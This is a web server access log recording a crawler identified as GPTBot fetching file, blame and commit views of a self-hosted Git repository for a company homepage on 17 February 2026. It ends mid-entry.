"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" -[17/Feb/2026:13:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 74.7.227.38] [Length 41620] [Gzip 13.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -[17/Feb/2026:13:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 74.7.227.38] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -[17/Feb/2026:13:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" [Client 74.7.227.38] [Length 11147] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" [Client 74.7.227.38] [Length 65420] [Gzip 13.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 74.7.227.38] [Length 10321] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:13:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 74.7.227.38] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:13:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 74.7.227.38] [Length 31006] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:13:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 74.7.227.38] [Length 47148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" -[17/Feb/2026:13:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 74.7.227.38] [Length 43631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" -[17/Feb/2026:13:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 74.7.227.38] [Length 4798] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" -[17/Feb/2026:13:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 1657474] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10123] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" [Client 74.7.227.38] [Length 56835] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" [Client 74.7.227.38] [Length 34901] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" [Client 74.7.227.38] [Length 56184] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 74.7.227.38] [Length 17281] [Gzip 8.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" -[17/Feb/2026:13:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 74.7.227.38] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:13:03:32 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10732] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:13:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 74.7.227.38] [Length 1659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" -[17/Feb/2026:13:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10822] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 74.7.227.38] [Length 17062] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" -[17/Feb/2026:13:03:34 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10828] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" [Client 74.7.227.38] [Length 10952] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:13:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" [Client 74.7.227.38] [Length 50664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:13:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 74.7.227.38] [Length 12443] [Gzip 5.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" -[17/Feb/2026:13:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" [Client 74.7.227.38] [Length 14333] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" [Client 74.7.227.38] [Length 10163] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" -[17/Feb/2026:13:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt" [Client 74.7.227.38] [Length 9862] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" -[17/Feb/2026:13:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9928] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" -[17/Feb/2026:13:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10103] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" [Client 74.7.227.38] [Length 10883] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" -[17/Feb/2026:13:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" -[17/Feb/2026:13:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 74.7.227.38] [Length 15614] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" -[17/Feb/2026:13:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 1657442] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" [Client 74.7.227.38] [Length 10756] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" -[17/Feb/2026:13:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" [Client 74.7.227.38] [Length 9917] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" [Client 74.7.227.38] [Length 10561] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt" [Client 74.7.227.38] [Length 9909] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt" -[17/Feb/2026:13:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" -[17/Feb/2026:13:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 74.7.227.38] [Length 11453] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" [Client 74.7.227.38] [Length 10507] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" -[17/Feb/2026:13:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" [Client 74.7.227.38] [Length 10973] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 74.7.227.38] [Length 11478] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 74.7.227.38] [Length 11608] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" [Client 74.7.227.38] [Length 10170] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" -[17/Feb/2026:13:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" [Client 74.7.227.38] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" -[17/Feb/2026:13:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" -[17/Feb/2026:13:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" -[17/Feb/2026:13:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" -[17/Feb/2026:13:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 74.7.227.38] [Length 11886] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" -[17/Feb/2026:13:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 